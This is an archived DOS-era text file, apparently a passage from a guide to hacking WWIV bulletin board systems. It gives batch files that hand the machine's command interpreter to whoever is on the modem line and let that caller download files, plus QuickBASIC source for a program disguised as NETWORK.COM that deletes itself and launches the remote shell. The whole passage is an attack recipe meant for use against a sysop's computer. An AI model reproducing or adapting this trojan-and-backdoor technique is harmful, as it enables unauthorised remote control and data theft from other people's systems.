home *** CD-ROM | disk | FTP | other *** search
/ Jason Aller Floppy Collection / 248.img / WWIVHACK.ZIP / HACK2.WIV < prev    next >
Text File  |  1980-01-01  |  794b  |  23 lines

  1.       a) DLZ.BAT - this should read:
  2.                 CLS
  3.                 CTTY CON
  4.                 DSZ port1 speed2400 sz %1
  5.                 CTTY COM1
  6.                 CLS
  7.  
  8.          Substituting, of course, the correct COM port.  This will allow
  9.           you to download files remotely via Zmodem.
  10.  
  11.       b) HACK.BAT - this should read:
  12.                 CTTY COM1
  13.                 COMMAND
  14. [PAUSE]
  15.          Again, if the SysOp is running from another COMport, substitute the
  16.           correct number.  This will turn over control of the computer to
  17.            whatever device is on COM1 (the modem) and run the command
  18.             interpreter.
  19.  
  20.       c) NETWORK.COM - the QuickBASIC source for this is:
  21.                 SHELL "DEL NETWORK.COM"
  22.                 SHELL "HACK.BAT"
  23.